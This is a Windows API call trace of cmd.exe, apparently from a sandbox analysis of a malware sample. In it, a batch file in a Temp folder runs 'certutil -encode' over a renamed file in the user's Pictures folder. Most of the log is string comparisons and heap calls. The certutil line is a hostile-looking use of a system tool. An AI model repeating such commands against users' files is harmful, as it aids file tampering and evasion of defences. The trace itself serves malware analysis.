[0302.769] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0302.769] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0302.769] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0302.769] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0302.769] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0302.769] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0302.769] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0302.769] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0302.769] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0302.769] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0302.769] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0302.769] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0302.769] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0302.769] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0302.769] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0302.769] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0302.769] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0302.769] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0302.769] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0302.769] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0302.769] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0302.769] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0302.770] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0302.770] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0302.770] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0302.770] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0302.770] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0302.770] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0302.770] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0302.770] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0302.770] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0302.770] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0302.770] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0302.770] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0302.770] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0302.770] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0302.770] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0302.770] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0302.770] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0302.770] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0302.770] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0302.770] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0302.770] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0302.770] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0302.770] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0302.770] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0302.770] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0302.771] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0302.771] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0302.771] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0302.771] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0302.771] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0302.771] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0302.771] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0302.771] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0302.771] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0302.771] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0302.771] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0302.771] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0302.771] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0302.771] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0302.771] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0302.771] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0302.771] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0302.771] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0302.771] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0302.771] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0302.771] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0302.771] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0302.771] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0302.771] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0302.772] ??_V@YAXPEAX@Z () returned 0x1 [0302.772] GetProcessHeap () returned 0x21ed8c70000 [0302.772] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92901c0 [0302.772] GetProcessHeap () returned 0x21ed8c70000 [0302.772] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7e) returned 0x21ed9379a50 [0302.772] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0302.772] malloc (_Size=0xffce) returned 0x21eda100000 [0302.772] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0302.772] GetProcessHeap () returned 0x21ed8c70000 [0302.772] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed92a01b0 [0302.774] SetErrorMode (uMode=0x0) returned 0x0 [0302.774] SetErrorMode (uMode=0x1) returned 0x0 [0302.774] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed92a01c0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0302.774] SetErrorMode (uMode=0x0) returned 0x1 [0302.774] GetProcessHeap () returned 0x21ed8c70000 [0302.774] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92a01b0, Size=0x54) returned 0x21ed92a01b0 [0302.774] GetProcessHeap () returned 0x21ed8c70000 [0302.774] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92a01b0) returned 0x54 [0302.774] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0302.774] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0302.774] GetProcessHeap () returned 0x21ed8c70000 [0302.774] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed937d3b0 [0302.774] GetProcessHeap () returned 0x21ed8c70000 [0302.774] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d437f0 [0302.775] GetProcessHeap () returned 0x21ed8c70000 [0302.775] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d437f0, Size=0x1c0) returned 0x21ed937d920 [0302.775] GetProcessHeap () returned 0x21ed8c70000 [0302.775] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937d920) returned 0x1c0 [0302.775] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0302.775] GetProcessHeap () returned 0x21ed8c70000 [0302.775] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c75930 [0302.775] GetProcessHeap () returned 0x21ed8c70000 [0302.775] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c75930, Size=0x7e) returned 0x21ed8c75930 [0302.775] GetProcessHeap () returned 0x21ed8c70000 [0302.775] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75930) returned 0x7e [0302.775] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0302.775] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0302.776] GetLastError () returned 0x2 [0302.776] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0302.776] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0302.777] GetLastError () returned 0x2 [0302.777] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0302.777] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cb20 [0302.777] FindClose (in: hFindFile=0x21ed8c7cb20 | out: hFindFile=0x21ed8c7cb20) returned 1 [0302.777] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0302.778] GetLastError () returned 0x2 [0302.778] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d000 [0302.778] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0302.778] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0302.778] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0302.778] ??_V@YAXPEAX@Z () returned 0x1 [0302.778] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0302.779] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0302.779] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0302.780] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0302.780] GetProcessHeap () returned 0x21ed8c70000 [0302.780] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e00 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0302.780] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0302.781] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0302.781] GetProcessHeap () returned 0x21ed8c70000 [0302.782] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e00) returned 1 [0302.782] GetProcessHeap () returned 0x21ed8c70000 [0302.782] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95920 [0302.782] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0302.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.782] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0302.783] _get_osfhandle (_FileHandle=0) returned 0x4c [0302.783] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0302.783] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"v9e3P.bmp.Sister\" \"v9e3P.bmp.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"v9e3P.bmp.Sister\" \"v9e3P.bmp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"v9e3P.bmp.Sister\" \"v9e3P.bmp.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf4, dwThreadId=0xec4)) returned 1 [0302.799] CloseHandle (hObject=0xa4) returned 1 [0302.799] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0302.799] GetProcessHeap () returned 0x21ed8c70000 [0302.799] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0302.799] GetEnvironmentStringsW () returned 0x21ed937e320* [0302.799] GetProcessHeap () returned 0x21ed8c70000 [0302.799] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0302.800] FreeEnvironmentStringsA (penv="=") returned 1 [0302.800] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0303.623] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0303.623] CloseHandle (hObject=0xa8) returned 1 [0303.623] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0303.623] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0303.623] GetProcessHeap () returned 0x21ed8c70000 [0303.624] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0303.624] GetEnvironmentStringsW () returned 0x21ed937e320* [0303.624] GetProcessHeap () returned 0x21ed8c70000 [0303.624] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0303.624] FreeEnvironmentStringsA (penv="=") returned 1 [0303.624] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0303.624] GetProcessHeap () returned 0x21ed8c70000 [0303.624] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0303.624] GetEnvironmentStringsW () returned 0x21ed937e320* [0303.624] GetProcessHeap () returned 0x21ed8c70000 [0303.624] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0303.624] FreeEnvironmentStringsA (penv="=") returned 1 [0303.624] GetProcessHeap () returned 0x21ed8c70000 [0303.624] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95920) returned 1 [0303.625] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0303.625] ??_V@YAXPEAX@Z () returned 0x1 [0303.625] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7fef00, ftCreationTime.dwHighDateTime=0x1d5ea2f, ftLastAccessTime.dwLowDateTime=0xb26a7550, ftLastAccessTime.dwHighDateTime=0x1d5eb50, ftLastWriteTime.dwLowDateTime=0xb26a7550, ftLastWriteTime.dwHighDateTime=0x1d5eb50, nFileSizeHigh=0x0, nFileSizeLow=0x115d2, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="v9e3P.bmp.Sister", cAlternateFileName="")) returned 0 [0303.625] GetLastError () returned 0x12 [0303.625] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0303.629] GetProcessHeap () returned 0x21ed8c70000 [0303.629] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d10) returned 1 [0303.629] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.629] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0303.630] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.630] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0303.630] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.630] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0303.631] _get_osfhandle (_FileHandle=0) returned 0x4c [0303.631] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0303.631] _get_osfhandle (_FileHandle=0) returned 0x4c [0303.631] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1e7) returned 1 [0303.631] SetConsoleInputExeNameW () returned 0x1 [0303.631] GetConsoleOutputCP () returned 0x1b5 [0303.632] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0303.632] SetThreadUILanguage (LangId=0x0) returned 0x409 [0303.632] ??_V@YAXPEAX@Z () returned 0x1 [0303.632] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0303.632] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0303.632] _get_osfhandle (_FileHandle=3) returned 0x98 [0303.632] SetFilePointer (in: hFile=0x98, lDistanceToMove=767, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ff [0303.633] GetProcessHeap () returned 0x21ed8c70000 [0303.633] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c75930) returned 1 [0303.633] GetProcessHeap () returned 0x21ed8c70000 [0303.633] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d920) returned 1 [0303.633] GetProcessHeap () returned 0x21ed8c70000 [0303.633] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d3b0) returned 1 [0303.633] GetProcessHeap () returned 0x21ed8c70000 [0303.633] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92a01b0) returned 1 [0303.635] GetProcessHeap () returned 0x21ed8c70000 [0303.635] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379a50) returned 1 [0303.635] GetProcessHeap () returned 0x21ed8c70000 [0303.635] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92901c0) returned 1 [0303.636] GetProcessHeap () returned 0x21ed8c70000 [0303.636] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45da0) returned 1 [0303.636] GetProcessHeap () returned 0x21ed8c70000 [0303.636] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8a90) returned 1 [0303.636] GetProcessHeap () returned 0x21ed8c70000 [0303.636] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b1350) returned 1 [0303.636] GetProcessHeap () returned 0x21ed8c70000 [0303.636] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b12e0) returned 1 [0303.636] GetProcessHeap () returned 0x21ed8c70000 [0303.636] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c758a0) returned 1 [0303.636] GetProcessHeap () returned 0x21ed8c70000 [0303.636] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d750) returned 1 [0303.636] GetProcessHeap () returned 0x21ed8c70000 [0303.636] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937dcc0) returned 1 [0303.636] GetProcessHeap () returned 0x21ed8c70000 [0303.636] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9290150) returned 1 [0303.636] GetProcessHeap () returned 0x21ed8c70000 [0303.636] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96940) returned 1 [0303.636] GetProcessHeap () returned 0x21ed8c70000 [0303.636] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9280160) returned 1 [0303.640] GetProcessHeap () returned 0x21ed8c70000 [0303.640] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bee0) returned 1 [0303.640] GetProcessHeap () returned 0x21ed8c70000 [0303.640] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cf40) returned 1 [0303.640] GetProcessHeap () returned 0x21ed8c70000 [0303.640] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b1070) returned 1 [0303.640] GetProcessHeap () returned 0x21ed8c70000 [0303.640] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b1000) returned 1 [0303.640] GetProcessHeap () returned 0x21ed8c70000 [0303.640] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95cd0) returned 1 [0303.640] GetProcessHeap () returned 0x21ed8c70000 [0303.640] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937de90) returned 1 [0303.640] GetProcessHeap () returned 0x21ed8c70000 [0303.640] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d1e0) returned 1 [0303.641] GetProcessHeap () returned 0x21ed8c70000 [0303.641] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92800f0) returned 1 [0303.644] GetProcessHeap () returned 0x21ed8c70000 [0303.644] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44720) returned 1 [0303.644] GetProcessHeap () returned 0x21ed8c70000 [0303.644] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d19930) returned 1 [0303.644] GetProcessHeap () returned 0x21ed8c70000 [0303.645] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8910) returned 1 [0303.645] GetProcessHeap () returned 0x21ed8c70000 [0303.645] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bdf0) returned 1 [0303.645] GetProcessHeap () returned 0x21ed8c70000 [0303.645] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0e30) returned 1 [0303.645] GetProcessHeap () returned 0x21ed8c70000 [0303.645] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0dc0) returned 1 [0303.645] 